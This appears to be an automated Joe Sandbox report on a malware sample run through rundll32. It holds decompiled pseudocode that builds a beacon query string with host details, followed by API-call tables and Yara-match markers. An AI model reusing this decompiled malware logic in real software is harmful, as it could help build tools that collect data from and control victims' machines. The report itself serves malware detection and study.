                          				_t67 =  *0x100a018; // 0xd4967592
                          				asm("bswap eax");
                          				_t68 =  *0x100a014; // 0x3a87c8cd
                          				asm("bswap eax");
                          				_t69 =  *0x100a010; // 0xd8d2f808
                          				asm("bswap eax");
                          				_t70 =  *0x100a00c; // 0x81762942
                          				asm("bswap eax");
                          				_t71 =  *0x100a348; // 0x428d5a8
                          				_t3 = _t71 + 0x100b62b; // 0x74666f73
                          				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x100a02c,  *0x100a004, _t66);
                          				_t74 = E01006927();
                          				_t75 =  *0x100a348; // 0x428d5a8
                          				_t4 = _t75 + 0x100b66b; // 0x74707526
                          				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
                          				_t176 =  &(_t174[0xe]);
                          				_t163 = _t162 + _t78;
                          				if(_a24 != 0) {
                          					_t141 =  *0x100a348; // 0x428d5a8
                          					_t8 = _t141 + 0x100b676; // 0x732526
                          					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
                          					_t176 =  &(_t176[3]);
                          					_t163 = _t163 + _t144;
                          				}
                          				_t79 =  *0x100a348; // 0x428d5a8
                          				_t10 = _t79 + 0x100b78e; // 0x5298d36
                          				_t182 = _a20 - _t10;
                          				_t12 = _t79 + 0x100b2de; // 0x74636126
                          				_t157 = 0 | _t182 == 0x00000000;
                          				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
                          				_t177 =  &(_t176[3]);
                          				_t164 = _t163 + _t82;
                          				_t83 = E010022D7(_t10);
                          				_a32 = _t83;
                          				if(_t83 != 0) {
                          					_t136 =  *0x100a348; // 0x428d5a8
                          					_t17 = _t136 + 0x100b8d0; // 0x736e6426
                          					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
                          					_t177 =  &(_t177[3]);
                          					_t164 = _t164 + _t139;
                          					HeapFree( *0x100a2d8, 0, _a40);
                          				}
                          				_t84 = E01002A11();
                          				_a32 = _t84;
                          				if(_t84 != 0) {
                          					_t132 =  *0x100a348; // 0x428d5a8
                          					_t21 = _t132 + 0x100b8d8; // 0x6f687726
                          					wsprintfA(_t164 + _t145, _t21, _t84);
                          					_t177 =  &(_t177[3]);
                          					HeapFree( *0x100a2d8, 0, _a40);
                          				}
                          				_t159 =  *0x100a3cc; // 0x52995b0
                          				_t86 = E01002509(0x100a00a, _t159 + 4);
                          				_t165 = 0;
                          				_a16 = _t86;
                          				if(_t86 == 0) {
                          					L28:
                          					HeapFree( *0x100a2d8, _t165, _t145);
                          					return _a44;
                          				} else {
                          					_t89 = RtlAllocateHeap( *0x100a2d8, 0, 0x800);
                          					_a24 = _t89;
                          					if(_t89 == 0) {
                          						L27:
                          						HeapFree( *0x100a2d8, _t165, _a8);
                          						goto L28;
                          					}
                          					E01001BE9(GetTickCount());
                          					_t93 =  *0x100a3cc; // 0x52995b0
                          					__imp__(_t93 + 0x40);
                          					asm("lock xadd [eax], ecx");
                          					_t97 =  *0x100a3cc; // 0x52995b0
                          					__imp__(_t97 + 0x40);
                          					_t99 =  *0x100a3cc; // 0x52995b0
                          					_t161 = E01001D33(1, _t157, _t145,  *_t99);
                          					asm("lock xadd [eax], ecx");
                          					if(_t161 == 0) {
                          						L26:
                          						HeapFree( *0x100a2d8, _t165, _a16);
                          						goto L27;
                          					}
                          					StrTrimA(_t161, 0x100928c);
                          					_push(_t161);
                          					_t105 = E0100393C();
                          					_v12 = _t105;
                          					if(_t105 == 0) {
                          						L25:
                          						HeapFree( *0x100a2d8, _t165, _t161);
                          						goto L26;
                          					}
                          					_t166 = __imp__;
                          					 *_t166(_t161, _a8);
                          					 *_t166(_a4, _v12);
                          					_t167 = __imp__;
                          					 *_t167(_v4, _v24);
                          					_t168 = E010061FC( *_t167(_v12, _t161), _v20);
                          					_v36 = _t168;
                          					if(_t168 == 0) {
                          						_v8 = 8;
                          						L23:
                          						E0100561E();
                          						L24:
                          						HeapFree( *0x100a2d8, 0, _v40);
                          						_t165 = 0;
                          						goto L25;
                          					}
                          					_t115 = E010010B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
                          					_v12 = _t115;
                          					if(_t115 == 0) {
                          						_t171 = _v24;
                          						_v20 = E01005B9D(_t171, _t168, _v16, _v12);
                          						_t123 =  *((intOrPtr*)(_t171 + 8));
                          						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                          						_t125 =  *((intOrPtr*)(_t171 + 8));
                          						 *((intOrPtr*)( *_t125 + 8))(_t125);
                          						_t127 =  *((intOrPtr*)(_t171 + 4));
                          						 *((intOrPtr*)( *_t127 + 8))(_t127);
                          						_t129 =  *_t171;
                          						 *((intOrPtr*)( *_t129 + 8))(_t129);
                          						E01006C2C(_t171);
                          					}
                          					if(_v8 != 0x10d2) {
                          						L18:
                          						if(_v8 == 0) {
                          							_t117 = _v16;
                          							if(_t117 != 0) {
                          								_t118 =  *_t117;
                          								_t169 =  *_v12;
                          								_v16 = _t118;
                          								wcstombs(_t118, _t118,  *_v12);
                          								 *_v24 = E01003C22(_v16, _v16, _t169 >> 1);
                          							}
                          						}
                          						goto L21;
                          					} else {
                          						if(_v16 != 0) {
                          							L21:
                          							E01006C2C(_v32);
                          							if(_v12 == 0 || _v8 == 0x10d2) {
                          								goto L24;
                          							} else {
                          								goto L23;
                          							}
                          						}
                          						_v8 = _v8 & 0x00000000;
                          						goto L18;
                          					}
                          				}
                          			}

                          APIs
                          • GetTickCount.KERNEL32 ref: 01003025
                          • wsprintfA.USER32 ref: 01003072
                          • wsprintfA.USER32 ref: 0100308F
                          • wsprintfA.USER32 ref: 010030B1
                          • wsprintfA.USER32 ref: 010030D8
                          • wsprintfA.USER32 ref: 01003103
                          • HeapFree.KERNEL32(00000000,?), ref: 01003116
                          • wsprintfA.USER32 ref: 01003135
                          • HeapFree.KERNEL32(00000000,?), ref: 01003146
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01003175
                          • GetTickCount.KERNEL32 ref: 01003187
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 0100319B
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 010031B9
                            • Part of subcall function 01001D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D5E
                            • Part of subcall function 01001D33: lstrlen.KERNEL32(00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D66
                            • Part of subcall function 01001D33: strcpy.NTDLL ref: 01001D7D
                            • Part of subcall function 01001D33: lstrcat.KERNEL32(00000000,00000000), ref: 01001D88
                            • Part of subcall function 01001D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 01001DA5
                          • StrTrimA.SHLWAPI(00000000,0100928C,?,052995B0), ref: 010031EB
                            • Part of subcall function 0100393C: lstrlen.KERNEL32(05299B68,00000000,00000000,00000000,01005902,00000000), ref: 0100394C
                            • Part of subcall function 0100393C: lstrlen.KERNEL32(?), ref: 01003954
                            • Part of subcall function 0100393C: lstrcpy.KERNEL32(00000000,05299B68), ref: 01003968
                            • Part of subcall function 0100393C: lstrcat.KERNEL32(00000000,?), ref: 01003973
                          • lstrcpy.KERNEL32(00000000,?), ref: 0100320E
                          • lstrcpy.KERNEL32(?,?), ref: 01003218
                          • lstrcat.KERNEL32(?,?), ref: 01003228
                          • lstrcat.KERNEL32(?,00000000), ref: 0100322F
                            • Part of subcall function 010061FC: lstrlen.KERNEL32(?,00000000,05299D70,00000000,010039E8,05299F93,69B25F44,?,?,?,?,69B25F44,00000005,0100A00C,4D283A53,?), ref: 01006203
                            • Part of subcall function 010061FC: mbstowcs.NTDLL ref: 0100622C
                            • Part of subcall function 010061FC: memset.NTDLL ref: 0100623E
                          • wcstombs.NTDLL ref: 010032D2
                            • Part of subcall function 01005B9D: SysAllocString.OLEAUT32(?), ref: 01005BD8
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • HeapFree.KERNEL32(00000000,?), ref: 0100331B
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01003327
                          • HeapFree.KERNEL32(00000000,?,?,052995B0), ref: 01003334
                          • HeapFree.KERNEL32(00000000,?), ref: 01003341
                          • HeapFree.KERNEL32(00000000,?), ref: 0100334B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                          • String ID:
                          • API String ID: 967369141-0
                          • Opcode ID: 29c9deb8247ffa69713222c17d711ccec9b81d0a1a0e30ea18a1b0c5f4231ebb
                          • Instruction ID: db4758bc6056aa706135e72c19443af3e325773fe049575cdbc53cb80556e64e
                          • Opcode Fuzzy Hash: 29c9deb8247ffa69713222c17d711ccec9b81d0a1a0e30ea18a1b0c5f4231ebb
                          • Instruction Fuzzy Hash: 3EA17971600315EFE763EB68DC88E9A7BE8FB88714F044828F5C8D7261CA3AD944CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32 ref: 05B7CED3
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7CEEF
                          • GetLastError.KERNEL32 ref: 05B7CF3E
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7CF54
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7CF68
                          • GetLastError.KERNEL32 ref: 05B7CF82
                          • GetLastError.KERNEL32 ref: 05B7CFB5
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7CFD3
                          • lstrlenW.KERNEL32(00000000,?), ref: 05B7CFFF
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7D014
                          • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 05B7D0E8
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7D0F7
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B7D10C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7D11F
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7D131
                          • RtlExitUserThread.NTDLL(?,?), ref: 05B7D146
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                          • String ID:
                          • API String ID: 3853681310-3916222277
                          • Opcode ID: 6454a4a0f7d4e9cf053aa3ef17408e663c6e6bc50fa484886792263920ff5aa4
                          • Instruction ID: 046cc76d7e77232839eac0d00bfae5eeecb3ee127906f05c78b9e1185940f55b
                          • Opcode Fuzzy Hash: 6454a4a0f7d4e9cf053aa3ef17408e663c6e6bc50fa484886792263920ff5aa4
                          • Instruction Fuzzy Hash: 8E813C71910209BFDB209FA4DC89EBE7FBAFB09214F10105AF525E7250DB35B949DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B77F9B
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B77FB8
                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05B78008
                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05B78012
                          • GetLastError.KERNEL32 ref: 05B7801C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7802D
                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 05B7804F
                          • HeapFree.KERNEL32(00000000,?), ref: 05B78086
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B7809A
                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 05B780A3
                          • SuspendThread.KERNEL32(?), ref: 05B780B2
                          • CreateEventA.KERNEL32(05B8A1E8,00000001,00000000), ref: 05B780C6
                          • SetEvent.KERNEL32(00000000), ref: 05B780D3
                          • CloseHandle.KERNEL32(00000000), ref: 05B780DA
                          • Sleep.KERNEL32(000001F4), ref: 05B780ED
                          • ResumeThread.KERNEL32(?), ref: 05B78111
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                          • String ID: v
                          • API String ID: 1011176505-1801730948
                          • Opcode ID: 28db31c3afb4b7409d55013a0a4f64071c5b8e4190fa551b697bd16fbdc83e74
                          • Instruction ID: b5b627e8ea70fce33844f0ae41e27a47b571589bf0cb81f44d8d41e422dd71a6
                          • Opcode Fuzzy Hash: 28db31c3afb4b7409d55013a0a4f64071c5b8e4190fa551b697bd16fbdc83e74
                          • Instruction Fuzzy Hash: 9C414B72910149FFCB20AFA4DC899BD7FBAFB04354B1450AAF622E3150DB31B985DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05B62CA9
                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 05B62CC7
                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 05B62CF3
                          • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 05B62D62
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B62DDA
                          • wsprintfA.USER32 ref: 05B62DF6
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B62E01
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B62E18
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B62EA4
                          • wsprintfA.USER32 ref: 05B62EBF
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B62ECA
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B62EE1
                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 05B62F03
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B62F1E
                          • wsprintfA.USER32 ref: 05B62F35
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B62F40
                            • Part of subcall function 05B63172: lstrlen.KERNEL32(05B643C6,00000000,?,?,?,?,05B643C6,00000035,00000000,?,00000000), ref: 05B631A2
                            • Part of subcall function 05B63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B631B8
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,05B643C6,00000000,?,?,05B643C6,00000035,00000000), ref: 05B631EE
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,05B643C6,00000035), ref: 05B63209
                            • Part of subcall function 05B63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05B63227
                            • Part of subcall function 05B63172: GetLastError.KERNEL32(?,?,05B643C6,00000035), ref: 05B63231
                            • Part of subcall function 05B63172: HeapFree.KERNEL32(00000000,00000000,?,?,05B643C6,00000035), ref: 05B63254
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B62F57
                          • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,05FB8A20), ref: 05B62F83
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                          • String ID:
                          • API String ID: 3130754786-0
                          • Opcode ID: d62fa00f35938ee66be761585dc788988c7a41bf96ce11d2385f3387d14f596e
                          • Instruction ID: 52c61fbd7c2628767db5a1645774dfea8ea7f9e78914d204781b3eda70aec9fa
                          • Opcode Fuzzy Hash: d62fa00f35938ee66be761585dc788988c7a41bf96ce11d2385f3387d14f596e
                          • Instruction Fuzzy Hash: 24A15B75900109BFEB219F94CC89DBEBBBAFB08304F1054A9F515A3250DB39BD45EB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?), ref: 05B711AA
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                            • Part of subcall function 05B7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05B7BC27
                            • Part of subcall function 05B7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 05B7BC5D
                            • Part of subcall function 05B7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 05B7BC79
                            • Part of subcall function 05B7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 05B7BC92
                            • Part of subcall function 05B7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 05B7BCA4
                            • Part of subcall function 05B7BAD1: FindClose.KERNEL32(?), ref: 05B7BCB9
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BCCD
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BCEF
                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 05B71206
                          • memcpy.NTDLL(00000000,?,00000000), ref: 05B71219
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B71230
                            • Part of subcall function 05B7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 05B7BD65
                            • Part of subcall function 05B7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 05B7BD77
                            • Part of subcall function 05B7BAD1: FindClose.KERNEL32(?), ref: 05B7BD92
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 05B7125B
                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 05B71273
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B712CD
                          • lstrlenW.KERNEL32(00000000,?), ref: 05B712F0
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B71302
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 05B71376
                          • HeapFree.KERNEL32(00000000,?), ref: 05B71386
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 05B713AF
                          • lstrlenW.KERNEL32(05B8B878,?), ref: 05B71429
                          • DeleteFileW.KERNEL32(?,?), ref: 05B71457
                          • HeapFree.KERNEL32(00000000,?), ref: 05B71465
                          • HeapFree.KERNEL32(00000000,?), ref: 05B71486
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                          • String ID:
                          • API String ID: 72361108-0
                          • Opcode ID: 17b7e11f3bb55a601151a445300bc6214bb5f69440e174c9e20d5a6d7b4d9978
                          • Instruction ID: c85ec8920366021e63ce4a241418dad46674dc9b2a7016bbfe20d252d3f7b263
                          • Opcode Fuzzy Hash: 17b7e11f3bb55a601151a445300bc6214bb5f69440e174c9e20d5a6d7b4d9978
                          • Instruction Fuzzy Hash: 129155B151021DBFCB10EBA4DC89CBA7FBEFB09350B046096F619D7151EA34B949DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B65465
                          • StrChrA.SHLWAPI(?,0000000D), ref: 05B654AB
                          • StrChrA.SHLWAPI(?,0000000A), ref: 05B654B8
                          • StrChrA.SHLWAPI(?,0000007C), ref: 05B654DF
                          • StrTrimA.SHLWAPI(?,05B85FCC), ref: 05B654F4
                          • StrChrA.SHLWAPI(?,0000003D), ref: 05B654FD
                          • StrTrimA.SHLWAPI(00000001,05B85FCC), ref: 05B65513
                          • _strupr.NTDLL ref: 05B6551A
                          • StrTrimA.SHLWAPI(?,?), ref: 05B65527
                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 05B6556F
                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 05B6558E
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                          • String ID: $;
                          • API String ID: 4019332941-73438061
                          • Opcode ID: f870471b9b5753b869a106ee08ced2b5e0369161b8894e33b1096c2fe689848f
                          • Instruction ID: 4bc8158428a44fb74cec58a56624f576d94021ff60b5c06dca3dda8cbf2ad79f
                          • Opcode Fuzzy Hash: f870471b9b5753b869a106ee08ced2b5e0369161b8894e33b1096c2fe689848f
                          • Instruction Fuzzy Hash: DC41A7716083069FD721EF29CC49B2BBBEAFF44600F444899F49A97281DB78F515CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • wsprintfA.USER32 ref: 05B72DF8
                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 05B72E0C
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 05B72F37
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B72E38
                          • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05B72E70
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                          • String ID: 0x%08X$W
                          • API String ID: 95801598-2600449260
                          • Opcode ID: eecf2c847c608e06257748308f11caaa21cfe10611103c5e411d33be2f24739c
                          • Instruction ID: b8b13c3fae319142f979898123ab21ff2e945b55efea0b7685eaffdd4112bd24
                          • Opcode Fuzzy Hash: eecf2c847c608e06257748308f11caaa21cfe10611103c5e411d33be2f24739c
                          • Instruction Fuzzy Hash: 14516AB4500609BFDB20DF65C889BAABBE9FF08714F108559F969DB280D7B4F644CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7C034
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 05B7C06D
                          • wcstombs.NTDLL ref: 05B7C077
                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 05B7C0A8
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0D4
                          • TerminateProcess.KERNEL32(?,000003E5), ref: 05B7C0EA
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0FE
                          • GetLastError.KERNEL32 ref: 05B7C102
                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 05B7C122
                          • CloseHandle.KERNEL32(?), ref: 05B7C131
                          • CloseHandle.KERNEL32(?), ref: 05B7C136
                          • GetLastError.KERNEL32 ref: 05B7C13A
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                          • String ID: D
                          • API String ID: 2463014471-2746444292
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05B64526
                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05B64545
                          • GetLastError.KERNEL32 ref: 05B646F6
                          • GetLastError.KERNEL32 ref: 05B64778
                          • SwitchToThread.KERNEL32(?,?,?,?), ref: 05B647C1
                          • GetLastError.KERNEL32 ref: 05B64813
                          • GetLastError.KERNEL32 ref: 05B64822
                          • RtlEnterCriticalSection.NTDLL(?), ref: 05B64832
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05B64843
                          • RtlExitUserThread.NTDLL(?), ref: 05B64851
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B648C0
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B64911
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05B64946
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05B64956
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                          • String ID:
                          • API String ID: 2794784202-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 05B6C03F
                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 05B6C058
                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 05B6C063
                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 05B6C07C
                          • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 05B6C11F
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B6C141
                          • lstrcpy.KERNEL32(00000020,?), ref: 05B6C160
                          • lstrlen.KERNEL32(?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 05B6C16A
                          • memcpy.NTDLL(?,?,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 05B6C1AB
                          • memcpy.NTDLL(?,?,?,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 05B6C1BE
